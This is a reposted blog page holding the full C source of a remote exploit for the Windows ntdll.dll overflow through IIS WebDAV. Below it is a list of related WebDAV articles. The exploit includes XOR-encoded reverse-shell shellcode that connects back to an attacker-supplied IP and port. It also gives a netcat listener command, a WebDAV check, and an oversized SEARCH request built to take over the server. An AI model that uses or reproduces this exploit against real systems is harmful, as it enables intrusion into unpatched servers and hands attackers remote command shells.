Microsoft Windows ntdll.dll exploit trough WebDAV

原创 2004年09月30日 19:37:00
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/


#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

char shellc0de[] =
"/x55/x8b/xec/x33/xc9/x53/x56/x57/x8d/x7d/xa2/xb1/x25/xb8/xcc/xcc"
"/xcc/xcc/xf3/xab/xeb/x09/xeb/x0c/x58/x5b/x59/x5a/x5c/x5d/xc3/xe8"
"/xf2/xff/xff/xff/x5b/x80/xc3/x10/x33/xc9/x66/xb9/xb5/x01/x80/x33"
"/x95/x43/xe2/xfa/x66/x83/xeb/x67/xfc/x8b/xcb/x8b/xf3/x66/x83/xc6"
"/x46/xad/x56/x40/x74/x16/x55/xe8/x13/x00/x00/x00/x8b/x64/x24/x08"
"/x64/x8f/x05/x00/x00/x00/x00/x58/x5d/x5e/xeb/xe5/x58/xeb/xb9/x64"
"/xff/x35/x00/x00/x00/x00/x64/x89/x25/x00/x00/x00/x00/x48/x66/x81"
"/x38/x4d/x5a/x75/xdb/x64/x8f/x05/x00/x00/x00/x00/x5d/x5e/x8b/xe8"
"/x03/x40/x3c/x8b/x78/x78/x03/xfd/x8b/x77/x20/x03/xf5/x33/xd2/x8b"
"/x06/x03/xc5/x81/x38/x47/x65/x74/x50/x75/x25/x81/x78/x04/x72/x6f"
"/x63/x41/x75/x1c/x81/x78/x08/x64/x64/x72/x65/x75/x13/x8b/x47/x24"
"/x03/xc5/x0f/xb7/x1c/x50/x8b/x47/x1c/x03/xc5/x8b/x1c/x98/x03/xdd"
"/x83/xc6/x04/x42/x3b/x57/x18/x75/xc6/x8b/xf1/x56/x55/xff/xd3/x83"
"/xc6/x0f/x89/x44/x24/x20/x56/x55/xff/xd3/x8b/xec/x81/xec/x94/x00"
"/x00/x00/x83/xc6/x0d/x56/xff/xd0/x89/x85/x7c/xff/xff/xff/x89/x9d"
"/x78/xff/xff/xff/x83/xc6/x0b/x56/x50/xff/xd3/x33/xc9/x51/x51/x51"
"/x51/x41/x51/x41/x51/xff/xd0/x89/x85/x94/x00/x00/x00/x8b/x85/x7c"
"/xff/xff/xff/x83/xc6/x0b/x56/x50/xff/xd3/x83/xc6/x08/x6a/x10/x56"
"/x8b/x8d/x94/x00/x00/x00/x51/xff/xd0/x33/xdb/xc7/x45/x8c/x44/x00"
"/x00/x00/x89/x5d/x90/x89/x5d/x94/x89/x5d/x98/x89/x5d/x9c/x89/x5d"
"/xa0/x89/x5d/xa4/x89/x5d/xa8/xc7/x45/xb8/x01/x01/x00/x00/x89/x5d"
"/xbc/x89/x5d/xc0/x8b/x9d/x94/x00/x00/x00/x89/x5d/xc4/x89/x5d/xc8"
"/x89/x5d/xcc/x8d/x45/xd0/x50/x8d/x4d/x8c/x51/x6a/x00/x6a/x00/x6a"
"/x00/x6a/x01/x6a/x00/x6a/x00/x83/xc6/x09/x56/x6a/x00/x8b/x45/x20"
"/xff/xd0"
"CreateProcessA/x00LoadLibraryA/x00ws2_32.dll/x00WSASocketA/x00"
"connect/x00/x02/x00/x02/x9A/xC0/xA8/x01/x01/x00"
"cmd" // don't change anything..
"/x00/x00/xe7/x77" // offsets of kernel32.dll for some win ver..
"/x00/x00/xe8/x77"
"/x00/x00/xf0/x77"
"/x00/x00/xe4/x77"
"/x00/x88/x3e/x04" // win2k3
"/x00/x00/xf7/xbf" // win9x =P
"/xff/xff/xff/xff";

int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";

if(strlen(host)>60) {
printf("error: victim host too long./r/n");
return 1;
}

if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}

sprintf(search,"SEARCH / HTTP/1.1/r/nHost: %s/r/n/r/n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}

printf("Checking WebDav on '%s' ... ",host);

if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR/r/n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND/r/n");
return 1;
}

void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]/r/n",program);
return;
}

void banner(void)
{
printf("/r/n/t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]/r/n");
printf("/t/twww.coromputer.net && undernet #coromputer/r/n/r/n");
return;
}

void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=/"1.0/"?>/r/n"
"<g:searchrequest xmlns:g=/"DAV:/">/r/n"
"<g:sql>/r/n"
"Select /"DAV:displayname/" from scope()/r/n"
"</g:sql>/r/n"
"</g:searchrequest>/r/n";

banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}

if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}

if(test_host(argv[1]))
return;

if(argc==5)
PAD+=atoi(argv[4]);

printf("FOUND/r/nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]/r/n",PAD,PAD);

ip = inet_addr(argv[2]); ip1 = (char*)&ip;

shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];

port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];

// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}

if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}

crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}

printf("Connecting... ");

if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR/r/n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);

/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;

buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1/r/nHost: %s/r/nContent-type: text/xml/r/nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d/r/n/r/n",request,strlen(content));
printf("CONNECTED/r/nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT/r/n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched./r/n");
printf("data: %s/r/n",data);
} else
printf("Now if you are lucky you will get a shell./r/n");
closesocket(s);
return;
}

Microsoft IIS WebDAV安全漏洞

0x01 漏洞简介            Windows Server是微软发布的一系列服务器操作系统。Internet Information Services(IIS)是一套运行于Microso...
  • qq_29277155
  • qq_29277155
  • 2017年04月27日 11:42
  • 940

【实战】WebDav漏洞简单分析及通用exploit设计

WebDav漏洞简单分析及通用exploit设计创建时间:2003-05-09文章属性:原创文章提交:eyas (ey4s_at_21cn.com)WebDav漏洞简单分析及通用exploit设计ey...
  • freexploit
  • freexploit
  • 2005年03月30日 12:02
  • 1221

IIS 5.0 WebDAV - Proof of concept - shellcode included

/*************************************//* IIS 5.0 WebDAV -Proof of concept- *//* [ Bug: CAN-2003-010...
  • sunwear
  • sunwear
  • 2004年09月30日 19:38
  • 1912

WebDAV Windows配置

在Win 8/7中建立WebDAV服务器的方法: 转自http://www.xitonghome.com/article/html/5461.html   第一、您必须安装互联网信息服务(I...
  • wxg_kingwolfmsncn
  • wxg_kingwolfmsncn
  • 2015年04月25日 18:41
  • 959

Windows Server 2008 (R2) IIS 7.0 WebDAV设置

Windows Server 2008 (R2) IIS 7.0 WebDAV设置  2013-06-15 15:57 崔瑜 Windows Server 2008 (R2) IIS 7....
  • cuiy6642
  • cuiy6642
  • 2013年06月23日 23:18
  • 4286

在WIN7、WIN10操作系统用WebDAV映射网络驱动器需要的操作

如果WebDAV不是https的,win7默认是添加不上的,需要修改注册表使得WIN7同时支持http和https,默认只支持https,然后重启服务 某一服务器,配置好了WebDAV。用苹果电脑作...
  • chengfei112233
  • chengfei112233
  • 2017年01月16日 14:32
  • 7797

webdav服务器端(debian)和客户端windows搭建和使用

3.1 WebDAV和Apache2 Apache服务器通过加载ismod_dav可以支持WebDAV文件夹,在Debian或Ubuntu上,输入下面的命令开启这个功能: a2enmod dav ...
  • newbird105
  • newbird105
  • 2014年12月30日 20:22
  • 1582

Windows Server 2008 IIS 7.0 WebDAV设置

update on Mar 4, 2013: 在新的计算机上同步文件的时候发现了不能下载附件。检查一下,原因是IIS的MIME里面没有支持".prop"类型文件,添加上去就可以了。现在就可以使用web...
  • fandongwei
  • fandongwei
  • 2013年02月16日 06:55
  • 13764

WebDrive --------WebDAV和自动版本化 - 客户端交互性

http://www.subversion.org.cn/svnbook/1.4/svn.webdav.clients.html所有的WebDAV客户端分为三类—独立应用程序,文件浏览器扩展或文件系统...
  • chief1985
  • chief1985
  • 2008年11月09日 22:05
  • 5272

Apache——Config WebDAV(windows配置webdav)

apache官方下载:http://httpd.apache.org/ 配置过程如下: Enviroment Web Server: Windows XP Professional Serv...
  • leeagle
  • leeagle
  • 2012年03月06日 00:06
  • 4078
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Microsoft Windows ntdll.dll exploit trough WebDAV
举报原因:
原因补充:

(最多只允许输入30个字)